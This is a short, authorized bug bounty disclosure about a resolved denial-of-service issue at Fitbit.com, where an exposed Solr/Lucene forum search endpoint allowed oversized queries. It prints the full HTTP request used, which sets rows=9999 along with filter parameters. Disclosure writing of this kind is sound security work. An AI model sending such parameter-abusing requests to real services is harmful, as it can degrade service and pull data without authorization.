Authorized Bug Bounty Disclosure
Target: Fitbit.com
Bug Type: Denial of Service
Disclosure Verification: Fitbit Authorized Disclosure on 03-09-2018
Identified a method to queue up and download gigabytes, if not terabytes of data from Fitbit forums through one web request 😳
Fitbit was extremely responsive and resolved this in a timely manner 😃
This is a location permission bug through Fitbit's implementation of solr/Lucene which enabled certain parameters to be manipulated. It was super interesting to research that tech, which is detailed here. Normally DOS (denial of service) is not within scope, however this was submitted as a general bug - with DOS potential ;)
Bug discovered: 2016-05-05
Bug Resolved: 2016-11-07
Using the payload below at [fitbit.com/search/solrForum], the server request responds by dumping a specified amount of forum data:
GET /search/solrForum?q=a&start=1&rows=9999&fq=(postStatus:0%20AND%20topicStatus:0) HTTP/1.1
Host: www.fitbit.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
It took a while to find the location, but though some research on the component, the services used were able to be identified. 😓
This is an issue where if utilized maliciously, could potentially cause a denial of service on the Fitbit platforms.